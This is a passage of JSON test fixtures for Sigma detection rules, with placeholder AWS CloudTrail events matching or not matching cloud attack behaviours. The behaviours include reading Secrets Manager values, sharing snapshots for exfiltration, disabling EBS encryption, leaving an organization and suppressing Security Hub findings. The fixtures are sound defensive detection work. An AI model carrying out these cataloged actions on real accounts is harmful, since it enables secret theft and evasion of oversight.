"AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | 
"sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "PutBucketLogging", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sso_idp_change_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "sso-directory.amazonaws.com", 27 | "eventName": "AssociateDirectory", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": 
"ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AssociateDirectory", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_acl_entries_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": 
"arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "CreateNetworkAclEntry", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateNetworkAclEntry", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | 
"responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_lambda_function_url_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "lambda.amazonaws.com", 27 | "eventName": "CreateFunctionUrlConfig", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | 
"accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateFunctionUrlConfig", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_getsecrets_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "secretsmanager.amazonaws.com", 27 | "eventName": 
"GetSecretValue", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSecretValue", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_batchgetsecretvalue_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | 
"userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "secretsmanager.amazonaws.com", 27 | "eventName": "GetSecretValue", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSecretValue", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": 
"1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_securityhub_finding_evasion_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "securityhub.amazonaws.com", 27 | "eventName": "BatchUpdateFindings", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": 
"AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "BatchUpdateFindings", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_organizations_leaveorganization_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | 
"eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "organizations.amazonaws.com", 27 | "eventName": "LeaveOrganization", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "LeaveOrganization", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_passed_role_to_glue_development_endpoint_tests.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "glue.amazonaws.com", 27 | "eventName": "CreateDevEndpoint", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 
| "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateDevEndpoint", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_snapshot_backup_exfiltration_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ModifySnapshotAttribute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | 
"should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ModifySnapshotAttribute", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_disable_encryption_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | 
"attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "DisableEbsEncryptionByDefault", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DisableEbsEncryptionByDefault", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 